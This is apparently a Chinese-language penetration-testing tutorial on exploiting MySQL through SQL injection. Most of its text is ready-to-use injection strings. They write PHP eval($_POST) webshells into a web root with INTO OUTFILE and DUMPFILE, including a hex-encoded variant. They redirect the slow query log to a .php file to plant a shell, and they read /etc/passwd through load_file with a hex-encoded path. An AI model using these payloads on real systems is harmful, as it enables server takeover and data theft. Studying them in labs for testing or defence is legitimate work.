1.导出函数写shell
触发条件
- 网站绝对路径
- secure_file_priv 的值非NULL或包含了导出的绝对路径
- mysql服务有对网站可访问路径的写权限
- .mysql连接用户有FILE权限/ROOT用户或ROOT权限
可以使用如下语句
show global variables like '%secure%';
#查询secure_file_priv的值,
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出
Mysql>=5.5.53 默认为NULL,即默认禁止导入导出
Mysql<5.5.53 默认为空,即默认无限制
secure_file_priv值为NULL = 禁止导入导出
使用函数
outfile 和 dumpfile
-
outfile
#实例 select '<?php phpinfo(); ?>' into outfile "C:\\\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
-
dumpfile
#实例 select '<?php phpinfo(); ?>' into dumpfile "C:\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
注意:
两者路径都不可用hex进制来表示
两个函数导出的格式有不同:outfile多行,dumpfile只能导出单行。写shell是注意格式
实践
1.一句话 outfile 直接写
#直接写
-1' union select 1,"<?php @eval($_POST['c']);?>" into outfile "C:/phpStudy/WWW/shell.php"#
#shell HEX编码
id=-1' union select 1,0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E into outfile "C:/phpStudy/WWW/shell.php"#
2.一句话 插入数据库再outfile
#写入数据
id=-1';insert into dvwa.guestbook values (2,"<?php @eval($_POST['c']);?>","shell") ;#
#读到shell.php
id=-1' union select comment,name from dvwa.guestbook into outfile 'C:/phpStudy/WWW/shell.php';#
select …… into outfile
使用命令 select 'a\naa\raaaa' into outfile '/tmp/test.txt'
来看一下在常用的写文件场景下的结果
可以看到outfile对导出内容中的\n等特殊字符进行了转义,并且在文件内容的末尾增加了一个新行
接着使用命令 select 'a\naa\raaaa' into dumpfile '/tmp/test.txt'
来看一下
可以看到dumpfile对文件内容是原意写入,未做任何转移和增加。这也就是为什么 在平常的UDF提权中使用dumpfile进行dll文件
写入的原因
2.用日志写shell
触发条件
- 网站可访问路径的绝对路径
- mysql服务有对网站可访问路径的写权限
- mysql连接用户有权限开启日志记录和更换日志路径/ROOT权限
mysql日志详解:https://blog.csdn.net/maguang_it/article/details/79922339
只有查询日志和慢查询日志可利用,演示用的是慢查询日志,
慢查询日志
慢查询日志是用来记录执行时间超过指定时间的查询语句。
#查询慢查询是否开启
SHOW GLOBAL VARIABLES LIKE '%query_log%';
#开启慢查询
set global slow_query_log = 1;
#更改日志路径,这里的日志路径可以hex编码
set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';
OFF 表示关闭,log_file
表示日志存放目录
完成时间大于10s的sql语句会被记录进慢查询日志,如:select * from users where sleep(11);
实践
1.开启慢查询日志并修改日志为网站路径下的脚本
-1';set global slow_query_log = 1;set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';#
2.执行包含Shell的查询语句并使用sleep(11)让语句记录进慢查询日志脚本
-1';select "<?php eval($_POST[log]);?>" from users where sleep(11);#
3.load_file读文件
触发条件
- 所读文件的绝对路径
- secure_file_priv 的值非NULL或包含了所读文件的绝对路径
- mysql服务有对所读文件的读权限
- mysql连接用户有FILE权限/ROOT用户或ROOT权限
使用函数load_file()
select load_file('绝对路径');
与outfile/dumpfile不同的是,load_file的路径可被hex编码
select load_file(0x2F6574632F706173737764);
参考